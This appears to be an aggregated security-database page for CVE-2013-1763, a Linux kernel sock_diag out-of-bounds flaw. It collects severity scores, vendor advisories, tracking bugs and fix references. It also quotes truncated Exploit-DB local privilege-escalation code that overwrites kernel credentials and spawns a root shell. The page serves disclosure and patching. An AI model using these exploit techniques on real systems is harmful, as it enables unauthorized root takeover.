CVE-2013-1763
Published: 2013-02-28
Priority P338 · high · CVSS 2.0: 7.2 (AV:L/AC:L/Au:N/C:C/I:C/A:C)
EXPLOIT
EPSS: 4.18% (89.7th percentile)
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
Affected (6 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | linux | — | — |
| linux | linux_kernel | >= 0 < 3.11.0-12.19 | 3.11.0-12.19 |
| linux | linux_kernel | >= 0 < 4.2.0-16.19 | 4.2.0-16.19 |
| linux | linux_kernel | >= 3.3 < 3.4.34 | 3.4.34 |
| linux | linux_kernel | >= 3.5 < 3.7.10 | 3.7.10 |
| linux | linux_kernel | >= 3.8 < 3.8.1 | 3.8.1 |
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 7.2 | HIGH | AV:L/AC:L/Au:N/C:C/I:C/A:C |
| osv | — | 7.2 | HIGH | — |
| vendor_debian | — | 7.2 | LOW | — |
| vendor_redhat | — | 7.2 | HIGH | — |
GHSA
GHSA-xmh4-cqm8-6p2v: Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag
ghsa_unreviewed · 2022-05-17 · HIGH · CWE-20
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
OSV
CVE-2013-1763: Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag
osv · 2013-02-23 · CVSS 7.2 · HIGH
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
Ubuntu
Linux kernel (OMAP4) vulnerability
vendor_ubuntu · 2013-02-27
Summary: The system could be made to crash or run programs as an administrator.
Mathias Krause discovered a bounds checking error for netlink messages requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit this flaw to crash the system or run programs as an administrator.
Instructions: After a standard system update you need to reboot your computer to make all the necessary changes.
Ubuntu
Linux kernel (Quantal HWE) vulnerability
vendor_ubuntu · 2013-02-26
Summary: The system could be made to crash or run programs as an administrator.
Mathias Krause discovered a bounds checking error for netlink messages requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit this flaw to crash the system or run programs as an administrator.
Instructions: After a standard system update you need to reboot your computer to make all the necessary changes.
Ubuntu
Linux kernel vulnerabilities
vendor_ubuntu · 2013-02-26
Summary: The system could be made to crash or run programs as an administrator.
Mathias Krause discovered a bounds checking error for netlink messages requesting SOCK_DIAG_BY_FAMILY. An unprivileged local user could exploit this flaw to crash the system or run programs as an administrator.
Instructions: After a standard system update you need to reboot your computer to make all the necessary changes.
Red Hat
kernel: sock_diag: out-of-bounds access to sock_diag_handlers[]
vendor_redhat · 2013-02-24 · CVSS 7.2 · HIGH · CWE-129
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
Statement: This issue did not affect the versions of the kernel package as shipped with Red Hat Enterprise Linux 5 and 6.
This issue was addressed in Red Hat Enterprise MRG 2 via RHSA-2013:0622 https://rhn.redhat.com/errata/RHSA-2013-0622.html
Package: kernel (Red Hat Enterprise Linux 5) - Not affected
Package: kernel (Red Hat Enterprise Linux 6) - Not affected
Debian
CVE-2013-1763: linux - Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in...
vendor_debian · 2013 · CVSS 7.2 · HIGH
Array index error in the __sock_diag_rcv_msg function in net/core/sock_diag.c in the Linux kernel before 3.7.10 allows local users to gain privileges via a large family value in a Netlink message.
Scope: local
bookworm: resolved
bullseye: resolved
forky: resolved
sid: resolved
trixie: resolved
No detection rules found.
Exploit-DB
Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) - 'SOCK_DIAG' SMEP Bypass Local Privilege Escalation
exploitdb · 2015-08-26 · CVSS 7.2 · HIGH
Linux Kernel
```c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
//#include
//#include
//#include
#include "sock_diag.h"
#include "unix_diag.h"
#include "netlink.h"
unsigned long user_cs;
unsigned long user_ss;
unsigned long user_rflags;
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
static void saveme() {
asm(
"movq %%cs, %0\n"
"movq %%ss, %1\n"
"pushfq\n"
"popq %2\n"
: "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory" );
}
void shell(void) {
if(!getuid())
system("/bin/sh");
exit(0);
}
```
Exploit-DB
Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Privilege Escalation (2)
exploitdb · 2013-03-13
Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Local Privilege Escalation (2)
---
```c
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
int __attribute__((regparm(3)))
x()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
char stage1[] = "\xff\x25\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
int main() {
int fd;
unsigned long mmap_start, mmap_size = 0x10000;
unsigned family;
struct {
struct nlmsghdr nlh;
struct
```
Exploit-DB
Linux Kernel 3.3.x < 3.7.x (Arch Linux x86-64) - 'sock_diag_handlers[]' Local Privilege Escalation (1)
exploitdb · 2013-02-27
Linux Kernel 3.3.x
```c
#define JUMP 0x0000100000001000LL
#define BASE 0x380000000
#define SIZE 0x010000000
#define KSIZE 0x2000000
static long ugid;
void patch_current() {
int i,j,k;
char *current = *(char**)(((long)&i) & (-8192));
long kbase = ((long)current)>>36;
for (i=0; i>36) != kbase)) continue;
for (j=0; j<20; j++) {
for (k = 0; k < 8; k++)
if (((int*)&ugid)[k%2] != t[j+k]) goto next;
for (i = 0; i < 8; i++) t[j+i] = 0;
for (i = 0; i < 10; i++) t[j+9+i] = -1;
return;
next:; }
}
}
int main()
{
long u = getuid();
long g = getgid();
int i, f = socket(16,3,4);
static int n[10] = {40,0x10014,0,0,45,-1};
assert(mmap((void*)(1<<12), 1<<20, 3, 0x32, 0, 0)!=-1);
setresuid(u,u,u); setresgid(g,g,g);
ugid = (g<<32)|u;
memcpy(1<<12, &patch_current, 1024);
for (i = 0; i < (1<<17); i++) ((voi
```
Exploit-DB
Linux Kernel 3.3 < 3.8 (Ubuntu / Fedora 18) - 'sock_diag_handlers()' Local Privilege Escalation (3)
exploitdb · 2013-02-24 · CVSS 7.2 · HIGH
Linux Kernel 3.3 hash.rehash_time, index 81
```c
 *
 * Fedora 18 support added
 *
 * 2/2013
 */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long sock_diag_handlers, nl_table;
int __attribute__((regparm(3)))
kernel_code()
{
commit_creds(prepare_kernel_cred(0));
return -1;
}
int jump_payload_not_used(void *skb, void *nlh)
{
asm volatile (
"mov $kernel_code, %eax\n"
"call *%eax\n"
);
}
unsigned long
get_symbol(char *name)
{
FILE *f;
unsigned long addr;
char dummy, sym
```
Bugzilla
CVE-2013-1763 kernel: sock_diag: out-of-bounds access to sock_diag_handlers[] [fedora-all]
bugzilla · 2013-02-24 · CVSS 7.2 · HIGH
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected versions
of Fedora.
For comments that are specific to the vulnerability please use bugs filed
against the "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please use the bodhi submission link
noted in the next comment(s). This will include the bug IDs of this
tracking bug as well as the relevant top-level CVE bugs.
Please also mention the CVE IDs being fixed in the RPM changelog and the
Bodhi notes field when available.
Please note: t
Bugzilla
CVE-2013-1763 kernel: sock_diag: out-of-bounds access to sock_diag_handlers[]
bugzilla · 2013-02-24 · CVSS 7.2 · HIGH
Description:
An unprivileged user can send a netlink message resulting in an out-of-bounds access of the sock_diag_handlers[] array which, in turn, allows userland to take over control while in kernel mode.
References:
http://seclists.org/oss-sec/2013/q1/420
http://thread.gmane.org/gmane.linux.network/260061
Upstream fix:
http://thread.gmane.org/gmane.linux.network/260061
Discussion:
Created kernel tracking bugs for this issue
Affects: fedora-all [bug 915057]
---
Statement:
This issue did not affect the versions of the kernel package as shipped with Red Hat Enterprise Linux 5 and 6.
This issue was addressed in Red Hat Enterprise MRG 2 via RHSA-2013:0622 https://rhn.redhat.com/errata/RHSA-2013-0622.html
References
- http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3Ba=commit%3Bh=6e601a53566d84e1ffd25e7b6fe0b6894ffd79c0
- http://lists.opensuse.org/opensuse-security-announce/2013-03/msg00004.html
- http://openwall.com/lists/oss-security/2013/02/25/12
- http://www.exploit-db.com/exploits/24555
- http://www.exploit-db.com/exploits/24746
- http://www.exploit-db.com/exploits/33336
- http://www.kernel.org/pub/linux/kernel/v3.x/ChangeLog-3.7.10
- http://www.mandriva.com/security/advisories?name=MDVSA-2013:176
- http://www.openwall.com/lists/oss-security/2013/02/24/3
- http://www.ubuntu.com/usn/USN-1749-1
- http://www.ubuntu.com/usn/USN-1750-1
- http://www.ubuntu.com/usn/USN-1751-1
- https://bugzilla.redhat.com/show_bug.cgi?id=915052
- https://github.com/torvalds/linux/commit/6e601a53566d84e1ffd25e7b6fe0b6894ffd79c0